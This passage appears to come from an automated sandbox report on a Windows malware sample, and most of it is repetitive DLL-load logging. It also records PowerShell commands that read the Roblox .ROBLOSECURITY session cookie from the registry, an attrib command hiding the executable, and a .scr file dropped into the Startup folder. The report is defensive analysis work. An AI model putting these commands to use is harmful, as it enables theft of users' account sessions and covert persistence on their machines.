                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: zamPeEkHWr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zamPeEkHWr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zamPeEkHWr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                        Data Obfuscation

                        barindex
                        Suspicious powershell command line found
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: zamPeEkHWr.exeStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8AABC0 push eax; iretd 0_2_00007FFD9B8AAC29
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeCode function: 0_2_00007FFD9B8700BD pushad ; iretd 0_2_00007FFD9B8700C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B77D2A5 pushad ; iretd 5_2_00007FFD9B77D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B962316 push 8B485F93h; iretd 5_2_00007FFD9B96231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9B972FA4 push edx; iretd 8_2_00007FFD9B972FAA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8B6387 push esp; retf 10_2_00007FFD9B8B6388
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFD9B886387 push esp; retf 15_2_00007FFD9B886388
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD9B870D20 push eax; retf 23_2_00007FFD9B870D4D

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJump to dropped file
                        Uses attrib.exe to hide files
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJump to dropped file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scrJump to dropped file
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scrJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scrJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr\:Zone.Identifier:$DATAJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
